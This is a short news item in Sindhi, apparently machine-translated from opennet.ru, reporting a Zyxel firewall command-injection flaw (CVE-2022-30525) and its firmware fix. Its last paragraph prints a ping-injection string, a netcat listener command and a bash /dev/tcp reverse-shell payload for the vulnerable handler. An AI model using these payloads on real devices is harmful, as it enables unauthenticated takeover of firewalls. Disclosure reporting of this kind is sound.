Zyxel فائر والز ۾ ڪمزوري جيڪا اجازت ڏئي ٿي ڪوڊ جي عمل کي بغير تصديق جي

ATP، VPN ۽ USG FLEX سيريز جي Zyxel ڊوائيسز ۾ هڪ نازڪ ڪمزوري (CVE-2022-30525) جي نشاندهي ڪئي وئي آهي، جيڪي ادارن ۾ فائر والز، IDS ۽ VPN جي آپريشن کي منظم ڪرڻ لاءِ ٺهيل آهن، جيڪي ٻاهرين حملي آور کي ڪوڊ تي عمل ڪرڻ جي اجازت ڏين ٿيون. ڊوائيس بغير صارف جي حقن جي بغير تصديق جي. حملي کي انجام ڏيڻ لاء، هڪ حملي آور کي HTTP/HTTPS پروٽوڪول استعمال ڪندي ڊوائيس تي درخواستون موڪلڻ جي قابل هوندو. Zyxel ZLD 5.30 فرم ویئر تازه ڪاري ۾ ڪمزور کي مقرر ڪيو آهي. شوڊان سروس جي مطابق، هن وقت عالمي نيٽ ورڪ تي 16213 امڪاني طور تي ڪمزور ڊوائيسز آهن جيڪي HTTP/HTTPS ذريعي درخواستون قبول ڪن ٿيون.

آپريشن ڪيو ويندو آهي خاص طور تي ٺهيل حڪم موڪليندڙ ويب هينڊلر ڏانهن /ztp/cgi-bin/handler، بغير تصديق جي رسائي. مسئلو درخواست جي پيرا ميٽرن جي صحيح صفائي نه ٿيڻ جي ڪري پيدا ٿيو آهي جڏهن سسٽم تي حڪمن تي عمل ڪندي os.system ڪال استعمال ڪندي lib_wan_settings.py لائبريري ۾ استعمال ڪيو ويو ۽ عمل ڪيو ويو جڏهن setWanPortSt آپريشن کي پروسيس ڪيو ويو.

مثال طور، هڪ حملو ڪندڙ تار پاس ڪري سگهي ٿو "؛ پنگ 192.168.1.210؛ جيڪو سسٽم تي "پنگ 192.168.1.210" حڪم جي عمل کي ڏسندو. ڪمانڊ شيل تائين رسائي حاصل ڪرڻ لاءِ، توھان هلائي سگھو ٿا ”nc -lvnp 1270“ توھان جي سسٽم تي، ۽ پوءِ ريورس ڪنيڪشن شروع ڪري سگھوٿا ڊوائيس ڏانھن درخواست موڪلڻ سان '؛ bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

جو ذريعو: opennet.ru

تبصرو شامل ڪريو